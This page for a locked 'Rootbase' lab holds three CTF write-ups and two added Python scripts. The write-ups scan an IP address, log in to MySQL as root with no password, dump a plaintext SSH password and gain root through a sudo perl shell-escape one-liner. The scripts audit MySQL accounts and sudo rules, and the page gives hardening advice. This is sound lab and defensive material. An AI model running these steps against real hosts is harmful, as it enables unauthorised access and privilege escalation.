Rootbase
Premium Machine (Locked)
The Rootbase server has been the backbone of three different applications over five years. Each team that inherited it assumed the previous one had secured it properly. None of them checked.
RatCTF
Community
Here's another scenario where the database administrator forgot to set a password for the database (why bother, since there's a DMZ?).
A quick port scan immediately reveals port 3306 running the MySQL service, version 8.0.42-0ubuntu0.20.04.1.
```
nmap -sV -p 22,3306 139.144.165.14
```
And that's it! Let's connect to the database as the root user without sending any password.
```
mysql --skip-ssl -h 139.144.165.14 -P 3306 -u root
```
And that's it! Next, we can list the databases and simply dump whatever is interesting.
```
SHOW DATABASES; -- credentials, information_schema, mysql, performance_schema, sys
USE credentials;
SHOW TABLES; -- config, users
SELECT * FROM users;
```
Voila! And wouldn't you know it, the database reveals plain text credentials that we can use to log into the target host via SSH!
```
ssh labuser@139.144.165.14
```
## Privilege Escalation
Within the target, simply running the command `sudo -l` will show that we can execute the `perl` binary with administrative permissions. A quick search on the GTFObins website shows us how to exploit it to gain a shell as the root user, and thus obtain the final flag!
```
sudo /usr/bin/perl -e 'exec "/bin/bash"'
```
This lab was a piece of cake, wasn't it?
## References
* https://www.tecmint.com/connect-to-mysql-without-root-password/
* https://gtfobins.org/gtfobins/perl/
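The writeup above turns on one misconfiguration: a MySQL root account with no password, reachable over the network. The following Python script is an added example, not code from this writeup or from the challenge; it audits constructed rows of `mysql.user` (a stand-in for `SELECT user, host, plugin, authentication_string FROM mysql.user;`) and a constructed `my.cnf` fragment, both invented for the demo, and emits the `ALTER USER`, `DROP USER` and `bind-address` fixes a DBA would apply.

```python
"""Audit MySQL account rows and server config for passwordless or remotely exposed accounts.

Added example, not code from any writeup on this page. SAMPLE_USERS is a
constructed stand-in for the rows of
    SELECT user, host, plugin, authentication_string FROM mysql.user;
and SAMPLE_MYCNF is a constructed my.cnf fragment. Feed in real output to use it.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    severity: str  # critical / high / medium
    subject: str   # account or setting the finding is about
    detail: str    # why it matters
    fix: str       # remediation, as the statement or setting an admin would apply


# Constructed sample rows: (user, host, plugin, authentication_string)
SAMPLE_USERS = [
    ("root", "localhost", "auth_socket", ""),                         # normal on Ubuntu
    ("root", "%", "caching_sha2_password", "$A$005$<hash>"),          # root reachable remotely
    ("report", "%", "caching_sha2_password", ""),                     # no password, any host
    ("legacy", "localhost", "mysql_native_password", ""),             # no password, local only
    ("app", "10.0.0.%", "caching_sha2_password", "$A$005$<hash>"),    # fine
]

# Constructed my.cnf fragment
SAMPLE_MYCNF = """
[mysqld]
bind-address = 0.0.0.0
"""

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def audit_users(rows):
    """Flag accounts that authenticate with no password or expose root remotely."""
    findings = []
    for user, host, plugin, auth in rows:
        if plugin == "auth_socket":
            # auth_socket checks the Unix-socket peer's OS user, so it is not
            # usable over TCP; an empty authentication_string is expected here.
            continue
        remote = host not in LOCAL_HOSTS
        if auth == "":
            findings.append(Finding(
                "critical" if remote else "high",
                f"'{user}'@'{host}'",
                "empty authentication_string: the account logs in without a password",
                f"ALTER USER '{user}'@'{host}' IDENTIFIED BY '<strong password>';"))
        elif user == "root" and host == "%":
            findings.append(Finding(
                "high", f"'{user}'@'{host}'",
                "superuser account accepts connections from any host",
                "DROP USER 'root'@'%'; -- keep root local-only; give apps least-privilege users"))
    return findings


def audit_bind_address(mycnf):
    """Flag a server that listens on every interface (MySQL 8 default is '*' when unset)."""
    m = re.search(r"^\s*bind-address\s*=\s*(\S+)", mycnf, re.MULTILINE)
    addr = m.group(1) if m else "*"
    if addr in {"*", "0.0.0.0", "::"}:
        return [Finding(
            "medium", "bind-address",
            f"mysqld listens on all interfaces ({addr}); port 3306 is reachable from the network",
            "bind-address = 127.0.0.1  (or restrict 3306 to trusted hosts at the firewall)")]
    return []


SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2}


def audit(rows, mycnf):
    """Run both checks and return findings, most severe first."""
    findings = audit_users(rows) + audit_bind_address(mycnf)
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f.severity])


if __name__ == "__main__":
    for f in audit(SAMPLE_USERS, SAMPLE_MYCNF):
        print(f"[{f.severity:8}] {f.subject}: {f.detail}\n           fix: {f.fix}")
```

On the sample data the script reports the passwordless remote account as critical, the passwordless local account and the remotely reachable root as high, and the wide-open `bind-address` as medium; the `auth_socket` root is deliberately skipped because that plugin cannot be used over TCP.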
Initial enumeration identified the MySQL service exposed on port 3306 alongside SSH.
```
nmap -sV -p 3306,22 139.144.165.14
```
Anonymous or weakly protected database access allowed connection to the MySQL instance.
```
mysql -h 139.144.165.14 -u root
```
Database enumeration revealed multiple schemas containing application tables and configuration data. Inspection of user-related and config tables exposed plaintext credentials stored insecurely.
```
SHOW DATABASES;
USE app;
SHOW TABLES;
SELECT * FROM users;
SELECT * FROM config;
```
Recovered credentials were reused to authenticate via SSH, providing initial shell access.
User flag retrieved after login.
Privilege Escalation
Local enumeration identified misconfigured sudo permissions allowing execution of a database-related binary or script with elevated privileges.
```
sudo -l
```
Exploitation of the allowed binary (or script execution context) enabled privilege escalation to root.
Root shell obtained and root flag captured.
Summary
Rootbase demonstrates insecure database exposure leading to credential leakage and full system compromise through credential reuse and sudo misconfiguration.
Challenge Description: The database administrator forgot the most important rule: always set a root password. Tap into the exposed data store, recover what was left in plaintext, and pivot your way to full control.
The initial port scan reveals a database service and an SSH management port. The challenge description hints at a critical misconfiguration in the database access control.
```
nmap -sV -p 3306,22 139.144.165.14
```
Result: Identified MySQL 8.0.42 on port 3306 and SSH on port 22.
The hint suggests that the MySQL root user has no password set. Accessing the database allows for the extraction of system credentials.
Database Exploitation:
Connecting to the remote MySQL instance while bypassing TLS/SSL certificate verification:
```
mysql -h 139.144.165.14 -u root --skip-ssl
```
Inside the MySQL monitor, we enumerate the databases and tables to find stored secrets:
```
SHOW DATABASES; -- Found 'credentials'
USE credentials;
SELECT * FROM users;
```
Output:
```
labuser:MySQLs3cret!
```
Initial Access:
Using the discovered credentials to log in via SSH:
```
ssh labuser@139.144.165.14
# Password: MySQLs3cret!
cat user.txt
```
User Flag:
```
flag{...._...._....}
```
After gaining shell access as labuser, we perform local enumeration to find a path to administrative privileges.
Checking Sudo Permissions:
```
sudo -l
```
The output reveals a permissive sudo configuration for the Perl interpreter:
```
(root) NOPASSWD: /usr/bin/perl
```
Exploitation:
Using Perl's ability to execute system commands to spawn a root shell. This bypasses the restricted user environment.
```
sudo perl -e 'exec "/bin/bash";'
```
Claiming Root:
```
whoami # root
cat /root/root.txt
```
Root Flag:
```
flag{...._...._....}
```
* Never leave the MySQL root account without a strong password, especially when the service is reachable over the network.
* Bind the service to localhost or protect it with strict firewall rules to prevent external enumeration.
* Avoid granting sudo permissions to powerful scripting languages (Perl, Python, Ruby) unless absolutely necessary, as they can easily be used to break out of restricted shells.
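The sudo rule at the heart of these writeups, `(root) NOPASSWD: /usr/bin/perl`, is exactly what a hardening check should catch before anyone else does. The following Python script is an added example, not code from any writeup on this page; it parses a constructed `sudo -l` listing (the hostname and the rules are invented for the demo) and flags rules that grant an interpreter, a shell, or `ALL` with root privileges, rating them most severe when tagged `NOPASSWD`. The interpreter and shell lists are assumptions chosen for the demo, not an exhaustive catalogue.

```python
"""Audit `sudo -l` output for rules that hand a user an interpreter or shell as root.

Added example, not part of any writeup on this page. SAMPLE_SUDO_L is a constructed
`sudo -l` listing (hostname and rules invented for the demo); run the parser over real
output, e.g. from `sudo -l -U <user>` in a hardening script, to find the same pattern.
"""
import os
import re
from dataclasses import dataclass


@dataclass
class Finding:
    severity: str
    rule: str
    detail: str
    fix: str


# Constructed sample output of `sudo -l`
SAMPLE_SUDO_L = """\
Matching Defaults entries for labuser on rootbase:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User labuser may run the following commands on rootbase:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/python3
    (root) /usr/bin/systemctl restart mysql
    (ALL : ALL) ALL
"""

# Interpreters and shells that can run arbitrary commands once started as root
# (assumed list for the demo; extend it for your environment)
INTERPRETERS = {"perl", "python", "python2", "python3", "ruby", "php", "node", "lua", "irb"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# "(root) NOPASSWD: SETENV: /usr/bin/perl" -> runas, tag list, command
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*?)\s*$")


def parse_sudo_l(text):
    """Return (runas, tags, command) for each rule listed after the 'may run' header."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
            rules.append((m.group("runas").strip(), tags, m.group("cmd")))
    return rules


def audit_rules(rules):
    """Flag rules that grant unrestricted execution or an interpreter/shell as another user."""
    findings = []
    for runas, tags, cmd in rules:
        nopasswd = "NOPASSWD" in tags
        base = os.path.basename(cmd.split()[0])
        if cmd == "ALL":
            findings.append(Finding(
                "critical", cmd, f"any command may be run as {runas}",
                "scope the rule to the specific commands the user needs"))
        elif base in INTERPRETERS or base in SHELLS:
            findings.append(Finding(
                "critical" if nopasswd else "high", cmd,
                f"{base} runs as {runas} and can execute any command (the GTFOBins shell-escape pattern)",
                "remove the rule, or replace the interpreter with a root-owned wrapper script that takes fixed arguments"))
    return findings


def audit(text):
    """Parse and audit a `sudo -l` listing in one call."""
    return audit_rules(parse_sudo_l(text))


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L):
        print(f"[{f.severity:8}] {f.rule}: {f.detail}\n           fix: {f.fix}")
```

The pinned `systemctl restart mysql` rule produces no finding because its argument list is fixed in sudoers; the bare `python3` rule is still flagged even without `NOPASSWD`, since a password prompt does not change what the interpreter can do once it runs as root.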